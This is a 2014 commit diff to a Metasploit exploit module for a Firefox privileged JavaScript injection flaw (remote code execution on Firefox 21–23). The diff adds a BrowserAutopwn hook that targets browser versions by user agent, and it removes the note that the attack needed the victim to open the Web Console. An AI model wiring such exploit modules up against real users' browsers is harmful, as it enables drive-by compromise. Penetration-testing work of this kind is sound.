Add browserautopwn hook now that this is not user-assisted.

joevennix · joevennix · commit 8c63c8f43db0 · 2014-08-15T16:28:21.000-05:00
diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
@@ -9,20 +9,24 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::Remote::BrowserAutopwn
   include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
 
+  autopwn_info({
+    :ua_name    => HttpClients::FF,
+    :ua_minver  => "17.0",
+    :ua_maxver  => "17.0.1",
+    :javascript => true,
+    :rank       => NormalRanking
+  })
+
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Firefox toString User-Assisted Privileged Javascript Injection',
+      'Name'           => 'Firefox toString console.time Privileged Javascript Injection',
       'Description'    => %q{
         This exploit gains remote code execution on Firefox 21-23 by abusing two separate
         Javascript-related vulnerabilities to ultimately inject malicious Javascript code
         into a context running with chrome:// privileges.
-
-        For the exploit to work, the user must have the Web Console open. There is no way to
-        trigger this from unprivileged Javascript, so for now a message is displayed telling
-        the user that there is an error and to press cmd-option-k to open the Web Console,
-        upon which the exploit will immediately run.
       },
       'License' => MSF_LICENSE,
       'Author'  => [
